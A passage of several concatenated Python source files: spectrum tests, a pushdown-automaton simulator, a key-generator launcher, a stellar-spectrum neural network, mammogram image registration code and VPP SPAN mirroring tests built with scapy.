assert len(spec_1) == 128
assert len(spec_2) == 128
assert spec_1[0] == 97
assert spec_1[-1] == 351
assert spec_2[0] == 98
assert spec_2[-1] == 352
# VIS spectrum only
with raises(ValueError):
_ = ir_multiplexer(CHANNELS[:96])
# Dimension too high
with raises(ValueError):
_ = ir_multiplexer([[[CHANNELS]]])
def test_ir_hot_pixels():
"""Test IR hot pixel detector from spectra."""
qub = QUB('1787314297_1', root=DATA)
# 1D spectrum
hot_pixels = ir_hot_pixels(qub['BACKGROUND'][0])
assert len(hot_pixels) == 10
assert_array(hot_pixels,
[105, 119, 124, 168, 239, 240, 275, 306, 317, 331])
# 2D spectra
hot_pixels = ir_hot_pixels(qub['BACKGROUND'])
assert len(hot_pixels) == 10
assert_array(hot_pixels,
[105, 119, 124, 168, 239, 240, 275, 306, 317, 331])
|
#!/usr/bin/env python3
import re
import collections
Transfer = collections.namedtuple('Transfer', ['newstate', 'newstack'])
automate = collections.defaultdict(lambda: collections.defaultdict(dict))
with open('automate.txt') as f:
start_stack = list(f.readline().split()[-1])
start = f.readline().split()[-1]
end = frozenset(f.readline().split()[2:])
for line in f:
match = re.fullmatch(r"\s*\(\s*(\w+)\s*,\s*(\w+)\s*,\s*(\w+)\s*\)\s*=\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)\s*", line)
state, char, stackchar, newstate, newstack = match.groups()
newstack = list(reversed(newstack)) if newstack != '_' else []
automate[state][stackchar][char] = Transfer(newstate, newstack)
def print_step(state, seq, stack):
print(f'({state},{seq if seq else "ε"},{"".join(reversed(stack)) if stack else "ε"}) ├─ ', end='')
def launch_automate(seq) -> None:
if (state := start) not in automate:
print('Ошибка! Неверно задано начальное состояние! Оно отсутствует в таблице!')
return
stack = start_stack.copy()
i = 0
while stack:
char = seq[i] if i < len(seq) else '_'
print_step(state, seq[i:], stack)
top_stack = stack.pop()
if (transition1 := automate.get(state)) is None:
print(f'\nОшибка! Состояние "{state}" отсутствует в таблице! Переход невозможен!')
return
if (transition2 := transition1.get(top_stack)) is None:
print(f'\nОшибка: Отсутствует переход из состояния "{state}" с символом {top_stack} в стеке')
return
if (transition3 := transition2.get(char)) is None:
if (transition3 := transition2.get('_')) is None:
print(f'\nОшибка: Отсутствует переход из состояния "{state}" с символом {char} в цепочке с символом {top_stack} в стеке')
return
else:
i -= 1
state = transition3.newstate
stack.extend(transition3.newstack)
i += 1
print_step(state, seq[i:], stack)
if state in end and i >= len(seq):
print('\nАвтомат допускает цепочку', seq)
elif state not in end:
print('\nСтек пуст, но автомат не пришёл в заключительное состояние!')
else:
print('\nСтек пуст, автомат в заключительном состоянии, но цепочка не кончилась!')
while True:
try:
seq = input('Введите цепочку. Для выхода из программы нажмите ^C\n> ')
except KeyboardInterrupt:
print()
break
launch_automate(seq)
|
import sys
sys.path.insert(1, 'src')
from src.gen_key import Pass_key
from src.colors1 import get_colors
def main():
try:
Pass_key.run()
except KeyboardInterrupt as ky:
print(get_colors.yellow()+get_colors.red() + "\n[!] CTRL+C Detected \n"+get_colors.cyan()+"Thanks For Usage :)")
if __name__ == "__main__":
main()
|
# code for predicting the spectrum of a single star in normalized space.
from __future__ import absolute_import, division, print_function # python2 compatibility
import numpy as np
from . import utils
def sigmoid(z):
'''
This is the activation function used by default in all our neural networks.
You can experiment with using an ReLU instead, but I got worse results in
some simple tests.
'''
return 1.0/(1.0 + np.exp(-z))
def get_spectrum_from_neural_net(scaled_labels, NN_coeffs):
'''
Predict the rest-frame spectrum (normalized) of a single star.
We input the scaled stellar labels (not in the original unit). Each label ranges from -0.5 to 0.5
'''
# assuming your NN has two hidden layers.
w_array_0, w_array_1, w_array_2, b_array_0, b_array_1, b_array_2, x_min, x_max = NN_coeffs
# the neural network architecture adopted in Ting+ 18, individual networks for individual pixels
#inside = np.einsum('ijk,k->ij', w_array_0, scaled_labels) + b_array_0
#outside = np.einsum('ik,ik->i', w_array_1, sigmoid(inside)) + b_array_1
#spectrum = w_array_2*sigmoid(outside) + b_array_2
# having a single large network seems for all pixels seems to work better
# as it exploits the information between adjacent pixels
inside = np.einsum('ij,j->i', w_array_0, scaled_labels) + b_array_0
outside = np.einsum('ij,j->i', w_array_1, sigmoid(inside)) + b_array_1
spectrum = np.einsum('ij,j->i', w_array_2, sigmoid(outside)) + b_array_2
return spectrum
|
import SimpleITK as sitk
import numpy as np
from preprocessing_images_functions import *
import os
import cv2
def generate_fit_transform(
fixed_image,
moving_image,
initial_transform,
learningRate=0.5,
numberOfIterations=200,
convergenceMinimumValue=1e-6,
convergenceWindowSize=10,
):
registration_method = sitk.ImageRegistrationMethod()
# Similarity metric settings.
registration_method.SetMetricAsMattesMutualInformation(numberOfHistogramBins=50)
registration_method.SetMetricSamplingStrategy(registration_method.RANDOM)
registration_method.SetMetricSamplingPercentage(0.05, 1234)
registration_method.SetInterpolator(sitk.sitkLinear)
# Optimizer settings.
registration_method.SetOptimizerAsGradientDescent(
learningRate=learningRate,
numberOfIterations=numberOfIterations,
convergenceMinimumValue=convergenceMinimumValue,
convergenceWindowSize=convergenceWindowSize,
)
registration_method.SetOptimizerScalesFromJacobian()
# Setup for the multi-resolution framework.
registration_method.SetShrinkFactorsPerLevel(shrinkFactors=[4, 2, 1])
registration_method.SetSmoothingSigmasPerLevel(smoothingSigmas=[2, 1, 0])
registration_method.SmoothingSigmasAreSpecifiedInPhysicalUnitsOn()
# Don't optimize in-place, we would possibly like to run this cell multiple times.
registration_method.SetInitialTransform(initial_transform, inPlace=False)
# Connect all of the observers so that we can perform plotting during registration.
# registration_method.AddCommand(sitk.sitkStartEvent, start_plot)
# registration_method.AddCommand(sitk.sitkEndEvent, end_plot)
# registration_method.AddCommand(sitk.sitkMultiResolutionIterationEvent, update_multires_iterations)
# registration_method.AddCommand(sitk.sitkIterationEvent, lambda: plot_values(registration_method))
final_transform = registration_method.Execute(
sitk.Cast(fixed_image, sitk.sitkFloat32),
sitk.Cast(moving_image, sitk.sitkFloat32),
)
return final_transform, registration_method
def generate_transformed_image(fixed_image, moving_image):
# returns the array form of the moving_image transformed and also the difference between the transformed_image and fixed_image
initial_transform = sitk.CenteredTransformInitializer(
fixed_image,
moving_image,
sitk.Euler2DTransform(),
sitk.CenteredTransformInitializerFilter.GEOMETRY,
)
moving_resampled = sitk.Resample(
moving_image,
fixed_image,
initial_transform,
sitk.sitkLinear,
0.0,
moving_image.GetPixelID(),
)
final_transform, registration_method = generate_fit_transform(
fixed_image, moving_image, initial_transform
)
moving_resampled = sitk.Resample(
moving_image,
fixed_image,
final_transform,
sitk.sitkLinear,
0.0,
moving_image.GetPixelID(),
)
moving_resampled_arr = sitk.GetArrayFromImage(moving_resampled)
fixed_image_arr = sitk.GetArrayFromImage(fixed_image)
differenced_images = moving_resampled_arr - fixed_image_arr
abs_differenced_images = np.absolute(differenced_images)
return (
moving_resampled_arr,
abs_differenced_images,
final_transform,
registration_method,
)
def resample(image, final_transform):
inverse_transform = final_transform.GetInverse()
# Output image Origin, Spacing, Size, Direction are taken from the reference
# image in this call to Resample
reference_image = image
interpolator = sitk.sitkLinear
default_value = 0.0
return sitk.Resample(
image,
reference_image,
inverse_transform,
interpolator,
default_value,
reference_image.GetPixelID(),
)
def crop_artifacts(img_arr, intensity_threshold=128.0):
# create artifact mask
mask = np.where(img_arr > intensity_threshold, 1.0, 0.0)
img_arr_copy = img_arr[:, :]
### row/horizontal artifact removal ###
artifact_remains = True
relative_threshold = intensity_threshold
while artifact_remains:
# Step 1: Find first non-background column (starting from leftmost columns)
colsums = np.sum(mask, 0) # "horizontal" sum
min_idx = np.min(np.nonzero(colsums))
# only grab first half of values, if it's in the bottom half it will be a vertical artifact, and taken care of later
first_nonzero_vector = img_arr_copy[: int(img_arr_copy.shape[0] / 2), min_idx]
# Step 2: Find location of relatively intense pixels in the list
vals, counts = np.unique(first_nonzero_vector, return_counts=True)
freq = sorted(list(zip(vals, counts)))
intense_vals = [val[0] for val in freq if val[0] > intensity_threshold]
# check if intense values exist, if not, all artifacts should be removed.
if len(intense_vals) == 0:
artifact_remains = False
break
relative_threshold = intense_vals[0]
min_crop_idx = np.min(
np.nonzero(np.where(first_nonzero_vector >= intense_vals[0], 1, 0))
)
max_crop_idx = np.max(
np.nonzero(np.where(first_nonzero_vector >= intense_vals[0], 1, 0))
)
# Step 3: Remove all pixels below the maximum crop index & minimum original indexes found, bc they're artifacts
img_arr_copy = img_arr_copy[max_crop_idx + 1 :, min_idx:]
# Step 4: Check if too much was removed (column-oriented artifact versus row-oriented)
original_area = img_arr.shape[0] * img_arr.shape[1]
new_area = img_arr_copy.shape[0] * img_arr_copy.shape[1]
if new_area <= original_area * 0.5:
print("Inverse orientation required.")
img_arr_copy = img_arr[:, :]
artifact_remains = True
relative_threshold = intensity_threshold
while artifact_remains:
# Step 1: Find first intense-pixel row (starting from topmost row)
rowsums = np.sum(mask, 1)
min_y_idx = np.min(np.nonzero(rowsums))
first_nonzero_row = img_arr_copy[min_y_idx, :]
# Step 2: Find location of relatively intense pixels in the column
vals, counts = np.unique(first_nonzero_row, return_counts=True)
freq = sorted(list(zip(vals, counts)))
# print(freq[-10:])
intense_vals = [val[0] for val in freq if val[0] > intensity_threshold]
# print(intense_vals)
# check if intense values exist, if not, all artifacts should be removed.
if len(intense_vals) == 0:
artifact_remains = False
break
relative_threshold = intense_vals[0]
min_x_idx = np.min(
np.nonzero(np.where(first_nonzero_row >= intense_vals[0], 1, 0))
)
max_x_idx = np.max(
np.nonzero(np.where(first_nonzero_row >= intense_vals[0], 1, 0))
)
# Step 3: Remove all pixels below the maximum y & minimum x indexes found, bc they're artifacts
img_arr_copy = img_arr_copy[
min_y_idx:, max_x_idx + 1 :,
]
# # clean up errant pixels
# img_arr_copy = np.where(img_arr_copy.astype(int) > relative_threshold, 0.0, img_arr)
return img_arr_copy
def remove_artifacts(differenced_image, final_transform):
# differenced image is the numpy array version
# conver to SITK Image object
differenced_image = sitk.GetImageFromArray(differenced_image)
# apply the inverse transformation
inverse_transformed_difference_img = resample(differenced_image, final_transform)
# convert to array
inverse_transformed_difference_img = sitk.GetArrayFromImage(
inverse_transformed_difference_img
)
# crop artifact pixels
cropped_differenced_img = crop_artifacts(inverse_transformed_difference_img)
return cropped_differenced_img
def generate_registered_images(fixed_image_arr, moving_image_arr):
# takes in a fixed_image_arr and moving_image_arr for now let's designate left to fixed and right to be moving in array form
# the fixed_image and moving_image_arr
# returns moving_resammpled_arr which is the right breast after translation in array form
# returns diff_image_noartifacts which is the overlayed and subtracted image in array form to be fed into the model
# returns metrics which is a dictionary of metrics to show the severity of the registration
# severity of registration is quantified by the difference in arrays before and after the registration process
fixedImageFile = "./fixed_image_arr.png"
movingImageFile = "./moving_image_arr.png"
cv2.imwrite(fixedImageFile, fixed_image_arr)
cv2.imwrite(movingImageFile, moving_image_arr)
fixed_image = sitk.ReadImage((fixedImageFile), sitk.sitkFloat32)
moving_image = sitk.ReadImage((movingImageFile), sitk.sitkFloat32)
os.remove(fixedImageFile)
os.remove(movingImageFile)
# fixed_image = sitk.GetImageFromArray(fixed_image_arr)
# moving_image= sitk.GetImageFromArray(moving_image_arr)
(
moving_resampled_arr,
differenced_images,
final_transform,
registration_method,
) = generate_transformed_image(fixed_image, moving_image)
# metrics
# after processing the fixed and moving image should be the same size so subtracting it should work
fixed_arr = sitk.GetArrayFromImage(fixed_image)
moving_arr = sitk.GetArrayFromImage(moving_image)
moving_arr_sized = size_image(moving_arr, fixed_arr.shape[0], fixed_arr.shape[1])
# euclidean distance between moving resampled and orig moving image
moving_dist = np.linalg.norm(moving_resampled_arr - moving_arr_sized)
breast_diff_dist = np.linalg.norm(fixed_arr - moving_arr_sized)
final_metricval = registration_method.GetMetricValue()
rotation_angle = final_transform.GetParameters()[0]
trans_x = final_transform.GetParameters()[1]
trans_y = final_transform.GetParameters()[2]
# put this into CSV?
metrics = {
"final_metric": final_metricval,
"rotation_angle": rotation_angle,
"trans_x": trans_x,
"trans_y": trans_y,
"moving_dist": moving_dist,
"init_breast_diff_dist": breast_diff_dist,
}
diff_image_noartifacts = remove_artifacts(differenced_images, final_transform)
return moving_resampled_arr, diff_image_noartifacts, metrics
|
#!/usr/bin/env python3
import unittest
from scapy.packet import Raw
from scapy.layers.l2 import Ether, Dot1Q, GRE, ERSPAN
from scapy.layers.inet import IP, UDP
from scapy.layers.vxlan import VXLAN
from framework import VppTestCase, VppTestRunner
from util import Host, ppp
from vpp_sub_interface import L2_VTR_OP, VppDot1QSubint, VppDot1ADSubint
from vpp_gre_interface import VppGreInterface
from collections import namedtuple
from vpp_papi import VppEnum
Tag = namedtuple('Tag', ['dot1', 'vlan'])
DOT1AD = 0x88A8
DOT1Q = 0x8100
class TestSpan(VppTestCase):
""" SPAN Test Case """
@classmethod
def setUpClass(cls):
super(TestSpan, cls).setUpClass()
# Test variables
cls.pkts_per_burst = 257 # Number of packets per burst
# create 3 pg interfaces
cls.create_pg_interfaces(range(3))
cls.bd_id = 55
cls.sub_if = VppDot1QSubint(cls, cls.pg0, 100)
cls.vlan_sub_if = VppDot1QSubint(cls, cls.pg2, 300)
cls.vlan_sub_if.set_vtr(L2_VTR_OP.L2_POP_1, tag=300)
cls.qinq_sub_if = VppDot1ADSubint(cls, cls.pg2, 33, 400, 500)
cls.qinq_sub_if.set_vtr(L2_VTR_OP.L2_POP_2, outer=500, inner=400)
# packet flows mapping pg0 -> pg1, pg2 -> pg3, etc.
cls.flows = dict()
cls.flows[cls.pg0] = [cls.pg1]
cls.flows[cls.pg1] = [cls.pg0]
# packet sizes
cls.pg_if_packet_sizes = [64, 512, 1518] # , 9018]
# setup all interfaces
for i in cls.pg_interfaces:
i.admin_up()
i.config_ip4()
i.resolve_arp()
cls.vxlan = cls.vapi.vxlan_add_del_tunnel(
src_address=cls.pg2.local_ip4n, dst_address=cls.pg2.remote_ip4n,
is_add=1, vni=1111)
def setUp(self):
super(TestSpan, self).setUp()
self.reset_packet_infos()
def tearDown(self):
super(TestSpan, self).tearDown()
def show_commands_at_teardown(self):
self.logger.info(self.vapi.ppcli("show interface span"))
def xconnect(self, a, b, is_add=1):
self.vapi.sw_interface_set_l2_xconnect(a, b, enable=is_add)
self.vapi.sw_interface_set_l2_xconnect(b, a, enable=is_add)
def bridge(self, sw_if_index, is_add=1):
self.vapi.sw_interface_set_l2_bridge(rx_sw_if_index=sw_if_index,
bd_id=self.bd_id, enable=is_add)
def _remove_tag(self, packet, vlan, tag_type):
self.assertEqual(packet.type, tag_type)
payload = packet.payload
self.assertEqual(payload.vlan, vlan)
inner_type = payload.type
payload = payload.payload
packet.remove_payload()
packet.add_payload(payload)
packet.type = inner_type
def remove_tags(self, packet, tags):
for t in tags:
self._remove_tag(packet, t.vlan, t.dot1)
return packet
def decap_gre(self, pkt):
"""
Decapsulate the original payload frame by removing GRE header
"""
self.assertEqual(pkt[Ether].src, self.pg2.local_mac)
self.assertEqual(pkt[Ether].dst, self.pg2.remote_mac)
self.assertEqual(pkt[IP].src, self.pg2.local_ip4)
self.assertEqual(pkt[IP].dst, self.pg2.remote_ip4)
return pkt[GRE].payload
def decap_erspan(self, pkt, session):
"""
Decapsulate the original payload frame by removing ERSPAN header
"""
self.assertEqual(pkt[Ether].src, self.pg2.local_mac)
self.assertEqual(pkt[Ether].dst, self.pg2.remote_mac)
self.assertEqual(pkt[IP].src, self.pg2.local_ip4)
self.assertEqual(pkt[IP].dst, self.pg2.remote_ip4)
self.assertEqual(pkt[ERSPAN].ver, 1)
self.assertEqual(pkt[ERSPAN].vlan, 0)
self.assertEqual(pkt[ERSPAN].cos, 0)
self.assertEqual(pkt[ERSPAN].en, 3)
self.assertEqual(pkt[ERSPAN].t, 0)
self.assertEqual(pkt[ERSPAN].session_id, session)
self.assertEqual(pkt[ERSPAN].reserved, 0)
self.assertEqual(pkt[ERSPAN].index, 0)
return pkt[ERSPAN].payload
def decap_vxlan(self, pkt):
"""
Decapsulate the original payload frame by removing VXLAN header
"""
self.assertEqual(pkt[Ether].src, self.pg2.local_mac)
self.assertEqual(pkt[Ether].dst, self.pg2.remote_mac)
self.assertEqual(pkt[IP].src, self.pg2.local_ip4)
self.assertEqual(pkt[IP].dst, self.pg2.remote_ip4)
return pkt[VXLAN].payload
def create_stream(self, src_if, packet_sizes, do_dot1=False, bcast=False):
pkts = []
dst_if = self.flows[src_if][0]
dst_mac = src_if.remote_mac
if bcast:
dst_mac = "ff:ff:ff:ff:ff:ff"
for i in range(0, self.pkts_per_burst):
payload = "span test"
size = packet_sizes[int((i / 2) % len(packet_sizes))]
p = (Ether(src=src_if.local_mac, dst=dst_mac) /
IP(src=src_if.remote_ip4, dst=dst_if.remote_ip4) /
UDP(sport=10000 + src_if.sw_if_index * 1000 + i, dport=1234) /
Raw(payload))
if do_dot1:
p = self.sub_if.add_dot1_layer(p)
self.extend_packet(p, size)
pkts.append(p)
return pkts
def verify_capture(self, cap1, cap2):
self.assertEqual(len(cap1), len(cap2),
"Different number of sent and mirrored packets :"
"%u != %u" % (len(cap1), len(cap2)))
pkts1 = [(pkt[Ether] / pkt[IP] / pkt[UDP]) for pkt in cap1]
pkts2 = [(pkt[Ether] / pkt[IP] / pkt[UDP]) for pkt in cap2]
self.assertEqual(pkts1.sort(), pkts2.sort())
def test_device_span(self):
""" SPAN device rx mirror """
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.pg0.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(self.pg0, self.pg_if_packet_sizes)
self.pg0.add_stream(pkts)
# Enable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.pg0.sw_if_index, self.pg2.sw_if_index)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.pg0.sw_if_index, self.pg2.sw_if_index, state=0)
self.xconnect(self.pg0.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_pkts)
def test_span_l2_rx(self):
""" SPAN l2 rx mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 subif and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
# Enable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, is_l2=1)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
pg2_expected = len(pkts)
pg1_pkts = self.pg1.get_capture(pg2_expected)
pg2_pkts = self.pg2.get_capture(pg2_expected)
self.bridge(self.pg2.sw_if_index, is_add=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_pkts)
def test_span_l2_rx_dst_vxlan(self):
""" SPAN l2 rx mirror into vxlan """
self.sub_if.admin_up()
self.vapi.sw_interface_set_flags(self.vxlan.sw_if_index,
flags=1)
self.bridge(self.vxlan.sw_if_index, is_add=1)
# Create bi-directional cross-connects between pg0 subif and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
# Enable SPAN on pg0 sub if (mirrored to vxlan)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.vxlan.sw_if_index, is_l2=1)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = [self.decap_vxlan(p) for p in self.pg2.get_capture(n_pkts)]
self.bridge(self.vxlan.sw_if_index, is_add=0)
# Disable SPAN on pg0 sub if (mirrored to vxlan)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.vxlan.sw_if_index, state=0, is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_pkts)
def test_span_l2_rx_dst_gre_erspan(self):
""" SPAN l2 rx mirror into gre-erspan """
self.sub_if.admin_up()
gre_if = VppGreInterface(self, self.pg2.local_ip4,
self.pg2.remote_ip4,
session=543,
type=(VppEnum.vl_api_gre_tunnel_type_t.
GRE_API_TUNNEL_TYPE_ERSPAN))
gre_if.add_vpp_config()
gre_if.admin_up()
self.bridge(gre_if.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
# Enable SPAN on pg0 sub if (mirrored to gre-erspan)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, gre_if.sw_if_index, is_l2=1)
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
def decap(p): return self.decap_erspan(p, session=543)
pg2_decaped = [decap(p) for p in pg2_pkts]
self.bridge(gre_if.sw_if_index, is_add=0)
# Disable SPAN on pg0 sub if
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, gre_if.sw_if_index, state=0, is_l2=1)
gre_if.remove_vpp_config()
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_decaped)
def test_span_l2_rx_dst_gre_subif_vtr(self):
""" SPAN l2 rx mirror into gre-subif+vtr """
self.sub_if.admin_up()
gre_if = VppGreInterface(self, self.pg2.local_ip4,
self.pg2.remote_ip4,
type=(VppEnum.vl_api_gre_tunnel_type_t.
GRE_API_TUNNEL_TYPE_TEB))
gre_if.add_vpp_config()
gre_if.admin_up()
gre_sub_if = VppDot1QSubint(self, gre_if, 500)
gre_sub_if.set_vtr(L2_VTR_OP.L2_POP_1, tag=500)
gre_sub_if.admin_up()
self.bridge(gre_sub_if.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
# Enable SPAN on pg0 sub if (mirrored to gre sub if)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, gre_sub_if.sw_if_index, is_l2=1)
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
def decap(p): return self.remove_tags(
self.decap_gre(p), [Tag(dot1=DOT1Q, vlan=500)])
pg2_decaped = [decap(p) for p in pg2_pkts]
self.bridge(gre_sub_if.sw_if_index, is_add=0)
# Disable SPAN on pg0 sub if
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, gre_sub_if.sw_if_index, state=0, is_l2=1)
gre_if.remove_vpp_config()
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_decaped)
def test_span_l2_rx_dst_1q_vtr(self):
""" SPAN l2 rx mirror into 1q subif+vtr """
self.sub_if.admin_up()
self.vlan_sub_if.admin_up()
self.bridge(self.vlan_sub_if.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.vlan_sub_if.sw_if_index, is_l2=1)
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
pg2_untagged = [self.remove_tags(p, [Tag(dot1=DOT1Q, vlan=300)])
for p in pg2_pkts]
self.bridge(self.vlan_sub_if.sw_if_index, is_add=0)
# Disable SPAN on pg0 sub if (mirrored to vxlan)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.vlan_sub_if.sw_if_index, state=0,
is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_untagged)
def test_span_l2_rx_dst_1ad_vtr(self):
""" SPAN l2 rx mirror into 1ad subif+vtr """
self.sub_if.admin_up()
self.qinq_sub_if.admin_up()
self.bridge(self.qinq_sub_if.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=1)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.qinq_sub_if.sw_if_index, is_l2=1)
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
pg2_untagged = [self.remove_tags(p, [Tag(dot1=DOT1AD, vlan=400),
Tag(dot1=DOT1Q, vlan=500)])
for p in pg2_pkts]
self.bridge(self.qinq_sub_if.sw_if_index, is_add=0)
# Disable SPAN on pg0 sub if (mirrored to vxlan)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.qinq_sub_if.sw_if_index, state=0,
is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_untagged)
def test_l2_tx_span(self):
""" SPAN l2 tx mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pkts)
# Enable SPAN on pg1 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.pg1.sw_if_index, self.pg2.sw_if_index, is_l2=1, state=2)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
n_pkts = len(pkts)
pg1_pkts = self.pg1.get_capture(n_pkts)
pg2_pkts = self.pg2.get_capture(n_pkts)
self.bridge(self.pg2.sw_if_index, is_add=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.pg1.sw_if_index, self.pg2.sw_if_index, state=0, is_l2=1)
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index, is_add=0)
self.verify_capture(pg1_pkts, pg2_pkts)
def test_l2_rx_tx_span(self):
""" SPAN l2 rx tx mirror """
self.sub_if.admin_up()
self.bridge(self.pg2.sw_if_index)
# Create bi-directional cross-connects between pg0 and pg1
self.xconnect(self.sub_if.sw_if_index, self.pg1.sw_if_index)
# Create incoming packet streams for packet-generator interfaces
pg0_pkts = self.create_stream(
self.pg0, self.pg_if_packet_sizes, do_dot1=True)
self.pg0.add_stream(pg0_pkts)
pg1_pkts = self.create_stream(
self.pg1, self.pg_if_packet_sizes, do_dot1=False)
self.pg1.add_stream(pg1_pkts)
# Enable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
self.sub_if.sw_if_index, self.pg2.sw_if_index, is_l2=1, state=3)
self.logger.info(self.vapi.ppcli("show interface span"))
# Enable packet capturing and start packet sending
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
# Verify packets outgoing packet streams on mirrored interface (pg2)
pg0_expected = len(pg1_pkts)
pg1_expected = len(pg0_pkts)
pg2_expected = pg0_expected + pg1_expected
pg0_pkts = self.pg0.get_capture(pg0_expected)
pg1_pkts = self.pg1.get_capture(pg1_expected)
pg2_pkts = self.pg2.get_capture(pg2_expected)
self.bridge(self.pg2.sw_if_index, is_add=0)
# Disable SPAN on pg0 (mirrored to pg2)
self.vapi.sw_interface_span_enable_disable(
